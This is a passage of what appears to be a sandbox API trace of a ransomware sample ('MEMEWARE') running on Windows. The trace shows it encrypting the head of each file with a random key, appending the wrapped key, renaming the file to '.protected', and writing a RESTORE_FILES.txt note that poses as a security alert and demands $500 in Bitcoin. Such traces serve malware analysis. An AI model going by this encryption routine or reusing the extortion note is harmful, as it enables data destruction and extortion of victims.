wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0070.945] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0070.946] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0070.946] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0070.946] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0070.946] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0070.946] CloseHandle (hObject=0xa4) returned 1 [0070.946] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0070.946] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="Windows") returned -1 [0070.946] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="Program Files") returned -1 [0070.946] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="Program Files (x86)") returned -1 [0070.946] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="$Recycle.bin") returned 1 [0070.946] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="System Volume Information") returned -1 [0070.946] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform") returned 61 [0070.946] lstrcmpW (lpString1="OfficeSoftwareProtectionPlatform", lpString2=".") returned 1 [0070.946] lstrcmpW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="..") returned 1 [0070.946] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*") returned 63 [0070.946] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0070.947] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0070.947] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0070.947] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0070.947] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0070.947] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0070.947] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\.") returned 63 [0070.947] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0070.947] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0070.947] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0070.947] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0070.947] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0070.947] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0070.947] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0070.947] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\..") returned 64 [0070.947] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0070.947] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0070.947] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0070.947] lstrcmpiW (lpString1="Cache", lpString2="Windows") returned -1 [0070.947] lstrcmpiW (lpString1="Cache", lpString2="Program Files") returned -1 [0070.947] lstrcmpiW (lpString1="Cache", lpString2="Program Files (x86)") returned -1 [0070.947] lstrcmpiW (lpString1="Cache", lpString2="$Recycle.bin") returned 1 [0070.947] lstrcmpiW (lpString1="Cache", lpString2="System Volume Information") returned -1 [0070.947] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache") returned 67 [0070.947] lstrcmpW (lpString1="Cache", lpString2=".") returned 1 [0070.947] lstrcmpW (lpString1="Cache", lpString2="..") returned 1 [0070.947] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*") returned 69 [0070.949] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0070.950] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0070.950] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0070.950] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0070.950] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0070.950] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0070.950] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\.") returned 69 [0070.950] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0070.950] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0070.950] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0070.950] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0070.950] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0070.950] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0070.950] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0070.950] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\..") returned 70 [0070.950] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0070.950] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0070.950] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0070.950] lstrcmpiW (lpString1="cache.dat", lpString2="Windows") returned -1 [0070.950] lstrcmpiW (lpString1="cache.dat", lpString2="Program Files") returned -1 [0070.950] lstrcmpiW (lpString1="cache.dat", lpString2="Program Files (x86)") returned -1 [0070.950] lstrcmpiW (lpString1="cache.dat", lpString2="$Recycle.bin") returned 1 [0070.950] lstrcmpiW (lpString1="cache.dat", lpString2="System Volume Information") returned -1 [0070.950] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat") returned 77 [0070.950] StrStrIW (lpFirst="cache.dat", lpSrch=".protected") returned 0x0 [0070.950] lstrcmpW (lpString1="cache.dat", lpString2="RESTORE_FILES.txt") returned -1 [0070.950] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0070.950] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0070.950] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0070.951] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat") returned 77 [0070.951] StrStrW (lpFirst="cache.dat", lpSrch=".txt") returned 0x0 [0070.951] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat") returned 77 [0070.951] StrStrW (lpFirst="cache.dat", lpSrch=".rar") returned 0x0 [0070.951] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat") returned 77 [0070.951] StrStrW (lpFirst="cache.dat", lpSrch=".zip") returned 0x0 [0070.951] ReadFile (in: hFile=0xd4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0070.986] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.987] WriteFile (in: hFile=0xd4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0070.987] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.987] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0070.994] WriteFile (in: hFile=0xd4, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0070.994] CloseHandle (hObject=0xd4) returned 1 [0070.995] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat.protected") returned 87 [0070.995] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat.protected" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat.protected")) returned 1 [0070.996] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0070.996] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0070.996] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\RESTORE_FILES.txt") returned 85 [0070.996] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\cache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0070.996] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0070.996] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0070.997] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0070.997] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0070.998] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0070.998] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0070.998] CloseHandle (hObject=0xb4) returned 1 [0070.998] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0070.998] lstrcmpiW (lpString1="tokens.dat", lpString2="Windows") returned -1 [0070.998] lstrcmpiW (lpString1="tokens.dat", lpString2="Program Files") returned 1 [0070.998] lstrcmpiW (lpString1="tokens.dat", lpString2="Program Files (x86)") returned 1 [0070.998] lstrcmpiW (lpString1="tokens.dat", lpString2="$Recycle.bin") returned 1 [0070.998] lstrcmpiW (lpString1="tokens.dat", lpString2="System Volume Information") returned 1 [0070.998] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat") returned 72 [0070.998] StrStrIW (lpFirst="tokens.dat", lpSrch=".protected") returned 0x0 [0070.998] lstrcmpW (lpString1="tokens.dat", lpString2="RESTORE_FILES.txt") returned 1 [0070.998] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0070.998] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0070.998] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\tokens.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0070.998] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat") returned 72 [0070.998] StrStrW (lpFirst="tokens.dat", lpSrch=".txt") returned 0x0 [0070.998] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat") returned 72 [0070.999] StrStrW (lpFirst="tokens.dat", lpSrch=".rar") returned 0x0 [0070.999] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat") returned 72 [0070.999] StrStrW (lpFirst="tokens.dat", lpSrch=".zip") returned 0x0 [0070.999] ReadFile (in: hFile=0xb4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0071.006] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.006] WriteFile (in: hFile=0xb4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0071.007] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.007] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0071.008] WriteFile (in: hFile=0xb4, lpBuffer=0x447c80*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447c80*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0071.009] CloseHandle (hObject=0xb4) returned 1 [0071.010] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat.protected") returned 82 [0071.010] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\tokens.dat"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat.protected" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\tokens.dat.protected")) returned 1 [0071.011] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0071.011] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0071.011] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\RESTORE_FILES.txt") returned 79 [0071.011] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0071.012] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.012] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0071.013] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0071.013] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0071.013] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.013] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0071.013] CloseHandle (hObject=0xa4) returned 1 [0071.013] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0071.013] lstrcmpiW (lpString1="RAC", lpString2="Windows") returned -1 [0071.013] lstrcmpiW (lpString1="RAC", lpString2="Program Files") returned 1 [0071.013] lstrcmpiW (lpString1="RAC", lpString2="Program Files (x86)") returned 1 [0071.013] lstrcmpiW (lpString1="RAC", lpString2="$Recycle.bin") returned 1 [0071.013] lstrcmpiW (lpString1="RAC", lpString2="System Volume Information") returned -1 [0071.013] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC") returned 32 [0071.013] lstrcmpW (lpString1="RAC", lpString2=".") returned 1 [0071.013] lstrcmpW (lpString1="RAC", lpString2="..") returned 1 [0071.013] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*") returned 34 [0071.013] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0071.014] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.014] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.014] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.014] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.014] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.014] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\.") returned 34 [0071.014] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.014] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.014] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.014] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.014] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.014] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.014] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.014] wnsprintfW (in: pszDest=0x47e9d8, 